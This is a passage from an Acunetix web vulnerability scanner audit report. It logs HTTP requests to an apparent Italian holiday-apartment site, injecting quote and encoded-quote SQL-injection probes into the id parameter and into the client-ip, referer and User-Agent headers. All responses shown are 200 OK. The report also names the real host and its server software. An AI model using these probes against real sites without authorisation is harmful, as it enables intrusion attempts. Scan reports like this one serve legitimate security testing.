6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close client-ip: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 44
  45. 45. /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close client-ip: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close client-ip: %27 Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:31:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request Acunetix Website Audit 45
  46. 46. GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close client-ip: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close client-ip: " Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=acunetix'" HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.12 Acunetix Website Audit 46
  47. 47. 66780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct )|utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=JyI%3D HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=%00' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit 47
  48. 48. HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=" HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html Acunetix Website Audit 48
  49. 49. /it/appartamento.php Details Request GET /it/appartamento.php?id=' HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php?id=%2527 HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* Acunetix Website Audit 49
  50. 50. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: " Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: %27 Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Acunetix Website Audit 50
  51. 51. Connection: Close referer: acunetix'" Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: JyI= Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit 51
  52. 52. Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close referer: ' Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:14 GMT Server: Microsoft-IIS/6.0 Acunetix Website Audit 52
  53. 53. X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: ' Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: %27 Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Acunetix Website Audit 53
  54. 54. Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: JyI= Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: ' Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: ' Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.12 Acunetix Website Audit 54
  55. 55. 66780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct )|utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: " Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response HTTP/1.1 200 OK Connection: close Date: Sat, 20 Feb 2010 19:30:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PleskWin X-Powered-By: PHP/5.2.3 Content-type: text/html /it/appartamento.php Details Request GET /it/appartamento.php HTTP/1.0 Accept: */* User-Agent: acunetix'" Host: www.ischiaappartamenti.com Cookie: __utma=177195445.1741444453.1266780532.1266780532.1266780532.1;__utmb=177195445.0.10.126 6780532;__utmc=177195445;__utmz=177195445.1266780532.1.1.utmcsr=(direct)|utmccn=(direct) |utmcmd=(none) Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Response Acunetix Website Audit 55

×